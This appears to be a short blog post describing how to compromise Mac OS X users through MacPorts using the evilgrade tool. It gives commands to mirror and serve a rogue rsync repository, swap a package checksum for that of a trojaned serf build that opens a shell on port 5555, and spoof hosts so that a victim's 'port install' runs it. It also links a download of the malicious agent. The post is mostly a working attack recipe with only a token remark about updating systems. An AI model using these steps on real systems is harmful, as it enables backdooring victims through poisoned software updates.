Pwning Mac OS X with evilgrade + MacPorts

The idea of this post is to show the flaws in the packages distribution of the project MacPorts for Mac OS X
The MacPorts use:
a) To update your repository rsync server
b) The packages are distributed via http / ftp
c) Before installing a new package it is checked with the MD5/SHA1 in the local repository

To perform the attack we need to do the following tasks:
1) Prepare the rsync server on the attacker's machine (192.168.10.133) with all the files of rsync.macports.org:

mkdir -p /dev/evilgrade/release/ports
mkdir -p /dev/evilgrade/release/base
#Obtenemos la informaciĆ³n necesaria
/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/ports/ /dev/evilgrade/release/ports/
/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/base/ /dev/evilgrade/release/base/

2) Configure the file /etc/rsyncd.conf:

max connections = 20
log file = /var/log/rsync.log
timeout = 300
[release]
comment = Stuff
path = /dev/evilgrade/release/
read only = yes
list = yes
uid = nobody
gid = nogroup
# auth users = craig
# secrets file = /etc/rsyncd.secrets
hosts allow = 192.168.10.0/24 #change for your subnet
3) Then start the rsync server /etc/init.d/rsync start
4) In this case we will attack the package serf in the category www. The idea is that when you install this package we create a listener shell port 5555
We have to edit the repository file /dev/evilgrade/release/ports/www/serf/Portfile and change checksums md5 with the hash of our payload/agent found in /evilgrade/agent/serf-0.7.2. tar.bz2

You could also prepare the repository for all "Porfiles" point to the same package with the same md5 so any installation which infect the victim port

This agent has a line (132) in Makefile.in to leave a shell at port 5555
4) On the victim machine (192.168.10.42) for this test add in /etc/hosts the following lines or make any forwarding traffic attack :
192.168.10.133 serf.googlecode.com rsync.macports.org
5) Start evilgrade on the attacker machine 192.168.10.133
6) On the victim machine run a "sudo port selfupdate" and then "sudo port install serf"
7) We verify that our attacker is receiving the rsync request by reading the file /var/log/rsync.log
Check what happend in evilgrade:
8) Enjoy your shell!
Download the MacPort agent from http://www.infobytesec.com/down/macportsevilgrade.tar.gz and uncompress it in the evilgrade path.
Remember to keep your systems updated! ;)

Source:infobytesec


Category Article

What's on Your Mind...

Thank f' u C0mment